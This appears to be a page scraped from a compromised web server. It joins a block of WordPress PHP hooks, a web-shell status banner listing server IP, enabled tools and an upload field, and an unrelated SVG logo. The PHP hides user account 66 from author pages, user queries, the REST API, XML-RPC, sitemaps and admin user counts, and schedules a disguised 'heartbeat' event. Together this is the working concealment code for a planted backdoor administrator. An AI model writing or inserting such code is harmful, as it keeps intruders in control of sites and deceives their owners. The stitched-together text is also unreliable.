add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/planetscifi2/public/images/ |
Upload File : |
<svg version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:a="http://ns.adobe.com/AdobeSVGViewerExtensions/3.0/"
x="0px" y="0px" width="191.2px" height="68.8px" viewBox="0 0 191.2 68.8" style="enable-background:new 0 0 191.2 68.8;"
xml:space="preserve">
<style type="text/css">
.st0{fill:#FFFFFF;}
</style>
<defs>
</defs>
<g>
<path class="st0" d="M6.8,6.6h1.6c1.6,0,2.9,0.8,3.9,2.3c1,1.4,1.5,3.5,1.5,6.3h6.7c0-2.1-0.3-4-0.7-5.7c-0.5-1.8-1.2-3.4-2.2-4.7
c-1-1.3-2.3-2.3-3.8-3c-1.5-0.7-3.4-1-5.5-1H0v14.4h6.8V6.6z"/>
</g>
<rect x="24.6" y="14.9" class="st0" width="6.7" height="15.4"/>
<g>
<path class="st0" d="M47.8,14.1c-0.7-0.5-1.5-0.9-2.1-1.2c-1.2-0.6-2.1-1.2-2.7-1.7c-0.6-0.5-0.9-1.2-0.9-2.1
c0-1.1,0.3-1.9,0.9-2.3C43.6,6.2,44.3,6,45,6c0.7,0,1.4,0.2,2.1,0.5c0.7,0.3,1.3,0.8,1.8,1.4l3.5-4.9c-0.9-0.9-1.9-1.6-3.2-2.1
C47.8,0.3,46.4,0,44.8,0c-1.1,0-2.2,0.2-3.2,0.5c-1.1,0.4-2,0.9-2.9,1.7C37.7,3,37,3.9,36.5,5.1c-0.5,1.2-0.8,2.6-0.8,4.2
c0,1.2,0.2,2.3,0.5,3.2s0.7,1.7,1.3,2.3c0.1,0.1,0.1,0.1,0.2,0.2h11.6C48.7,14.7,48.3,14.3,47.8,14.1"/>
<path class="st0" d="M64.4,6.4c0.4,0,0.8,0,1.2,0.1c0.4,0.1,0.8,0.3,1.1,0.6c0.3,0.3,0.6,0.7,0.8,1.1c0.2,0.5,0.3,1.1,0.3,1.8
c0,1.3-0.4,2.3-1.1,2.9c-0.7,0.6-1.5,0.9-2.5,0.9h-1.6l5.5,16.4h7l-5-13.2c0.5-0.2,1-0.4,1.5-0.8c0.5-0.4,1-0.9,1.4-1.5
c0.4-0.6,0.7-1.3,1-2.2c0.3-0.9,0.4-1.8,0.4-2.9c0-2.9-0.8-5.2-2.4-6.6c-1.6-1.5-3.8-2.2-6.7-2.2h-2.7v5.6H64.4z"/>
<path class="st0" d="M92.5,30.1c1.3-0.6,2.3-1.4,3.1-2.5c0.8-1.1,1.4-2.3,1.8-3.7c0.2-0.8,0.4-1.7,0.5-2.6h-6.8
C91,22,90.8,22.5,90.6,23c-0.3,0.5-0.6,0.9-1,1.2c-0.4,0.3-1,0.5-1.6,0.5c-0.7,0-1.2-0.2-1.6-0.5c-0.4-0.3-0.8-0.7-1-1.2
c-0.3-0.5-0.4-1.1-0.5-1.9c-0.1-0.7-0.1-1.5-0.1-2.3v-18H78v18.6c0,1.6,0.2,3.2,0.5,4.6c0.3,1.4,0.9,2.7,1.7,3.7
c0.8,1.1,1.8,1.9,3.1,2.5c1.2,0.6,2.8,0.9,4.6,0.9C89.7,31.1,91.2,30.8,92.5,30.1"/>
<path class="st0" d="M111.4,6.4c0.9,0,1.7,0.3,2.3,0.9c0.6,0.6,1,1.5,1,2.9c0,1.3-0.3,2.3-1,2.9c-0.6,0.7-1.4,1-2.3,1h-1.8v5.4h2.6
c1.1,0,2.2-0.2,3.2-0.6c1.1-0.4,2-1,2.8-1.7c0.8-0.8,1.5-1.8,2-3c0.5-1.2,0.8-2.6,0.8-4.2c0-1.7-0.3-3.2-0.8-4.4
c-0.5-1.2-1.3-2.1-2.1-2.8c-0.9-0.7-1.9-1.2-2.9-1.5c-1.1-0.3-2.1-0.5-3.2-0.5h-2.3v5.6H111.4z"/>
</g>
<rect x="121.6" y="0.8" class="st0" width="17.4" height="5.7"/>
<rect x="141.6" y="14.9" class="st0" width="6.7" height="15.4"/>
<polygon class="st0" points="191.1,17.9 191.1,12.4 182.8,12.4 182.8,6.7 191.1,6.7 191.1,0.8 176.4,0.8 176.4,17.9 "/>
<rect x="182.8" y="24.3" class="st0" width="8.4" height="6"/>
<rect x="6.4" y="62" class="st0" width="8.4" height="6"/>
<rect x="6.4" y="50.2" class="st0" width="7.2" height="5.5"/>
<rect x="6.4" y="38.5" class="st0" width="8.4" height="5.9"/>
<rect x="18.7" y="61.9" class="st0" width="14.7" height="6.2"/>
<rect x="87.3" y="62" class="st0" width="14.8" height="6"/>
<rect x="93.7" y="38.5" class="st0" width="8.3" height="5.9"/>
<rect x="93.7" y="50.2" class="st0" width="8.3" height="5.5"/>
<polygon class="st0" points="68.4,57.5 68.3,57.5 63.5,38.5 58.9,38.5 65.9,68 70.6,68 75.5,47.8 75.7,47.8 75.7,68 82,68 82,38.5
73.1,38.5 "/>
<rect x="36.4" y="38.5" class="st0" width="14.3" height="5.9"/>
<rect x="42.8" y="50.2" class="st0" width="7.2" height="5.5"/>
<rect x="42.8" y="62" class="st0" width="8.4" height="6"/>
<polygon class="st0" points="120.3,56.7 120.1,56.7 113.3,38.5 107.5,38.5 118.8,68 125.9,68 125.9,38.5 120.3,38.5 "/>
<g>
<path class="st0" d="M151.1,54.3c0.7,0.5,1.5,0.9,2.3,1.3c1.3,0.6,2.3,1.2,2.9,1.8c0.7,0.6,1,1.3,1,2.3c0,0.9-0.3,1.7-0.8,2.2
c-0.6,0.5-1.2,0.8-2,0.8c-0.9,0-1.7-0.2-2.5-0.6c-0.8-0.4-1.6-0.9-2.2-1.6l-3.4,5c0.9,0.9,2.1,1.7,3.5,2.3c1.5,0.7,3.1,1,4.9,1
c1.2,0,2.4-0.2,3.5-0.6c1.1-0.4,2.1-1,3-1.8c0.9-0.8,1.5-1.8,2-3c0.5-1.2,0.8-2.6,0.8-4.2c0-1.3-0.2-2.4-0.6-3.3
c-0.4-0.9-0.9-1.7-1.5-2.4c-0.2-0.2-0.5-0.5-0.7-0.7h-11.6C150,53.4,150.5,53.9,151.1,54.3"/>
</g>
<polygon class="st0" points="133.9,38.5 133.9,68 140.5,68 140.5,44.2 145.9,44.2 145.9,38.5 "/>
<polygon class="st0" points="62.7,13.8 62.7,13.8 62.7,13.7 "/>
<polygon class="st0" points="164.9,30.3 158.5,0.8 158.5,0.8 150.9,0.8 158.1,30.3 "/>
<rect x="133.9" y="38.5" class="st0" width="6.6" height="29.6"/>
</svg>